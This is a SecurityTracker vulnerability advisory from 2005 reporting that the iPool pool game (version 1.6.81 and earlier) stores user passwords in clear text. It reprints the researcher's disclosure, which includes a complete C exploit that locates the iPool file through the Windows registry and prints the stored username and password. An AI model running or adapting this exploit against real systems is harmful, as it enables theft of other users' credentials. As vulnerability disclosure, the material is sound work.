SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   iPool Vendors:   thepoolclub.com
iPool Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013458
SecurityTracker URL:  http://securitytracker.com/id/1013458
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 16 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.6.81 and prior versions
Description:   Kozan reported a vulnerability in iPool. A local user can obtain passwords.

The software stores user passwords in clear text in the 'Program Files\ThePoolClub\iPool\MyDetails.txt' file. A local user can read the file to obtain the target user's username and password.

Impact:   A local user can obtain a target user's iPool password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.thepoolclub.com/dls.html (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  iPool <= v1.6.81 Discloses Passwords to Local Users


iPool <= v1.6.81 Discloses Passwords to Local Users


I. BACKGROUND
-------------------

iPool is an online pool game and chat software.


Vendor: The Pool Club - thepoolclub.com
and Memir Software - memirsoftware.com


II. DESCRIPTION
-------------------

iPool stores and transmits passwords in
Program Files\ThePoolClub\iPool\MyDetails.txt file in clear text.

Password storing format of this file:
1. line = Username
2. line = Password


III. ANALYSIS
-------------------

Storing authentication credentials in clear text format is not a good idea.
This can be stolen through local access to the hard drive. In this situation,
the username and password can be obtained merely by viewing the txt file.


IV. DETECTION
-------------------

All versions iPool are vulnerable.


V. EXPLOIT
-------------------


/*****************************************************************

iPool <= v1.6.81 Local Password Disclosure Exploit by Kozan

Application: iPool 1.6.81

Vendor:
Memir Software - memirsoftware.com and
The Pool Club - thepoolclub.com

Vulnerable Description:
iPool 1.6.81 discloses passwords to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int main()
{
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                       
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey) == ERROR_SUCCESS)
        {

            lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
               (LPBYTE) prgfiles, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured. Can't get
password!\n");
                                 return -1;
                        }

                        RegCloseKey(hKey);

    }
        else
        {
                printf("An error occured. Can't get password!\n");
                return -1;
        }

        printf("\n\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\n");
        printf("Credits to ATmaCA\n");
        printf("kozan@netmagister.com\n");
        printf("www.netmagister.com - www.spyinstructors.com\n\n");


        char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];
        strcpy(pwdfile,strcat(prgfiles,"\\ThePoolClub\\iPool\\MyDetails.txt"));

        int addr, i, y;
        FILE *fp;
        char ch[100], ch2[100];

        if((fp=fopen(pwdfile,"rb")) == NULL)
        {
                printf("An error occured. Can't get password!\n");
                return -1;
        }


        fseek(fp,0,0);


        for(i=0;i<30;i++)
        {
                ch[i]=getc(fp);
                if(ch[i]==0x0D)
                {
                        ch[i]=NULL;
                        strcpy(username,ch);
                        break;
                }
        }

        addr = ftell(fp);
        fseek(fp,addr+1,0);

        for(y=0;y<30;y++)
        {
                ch2[y]=getc(fp);
                if(ch2[y]==0x0D)
                {
                        ch2[y]=NULL;
                        strcpy(password,ch2);
                        break;
                }
        }

        fclose(fp);

        printf("Username        : %s\n",username);
        printf("Password        : %s\n",password);

        return 0;
}




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC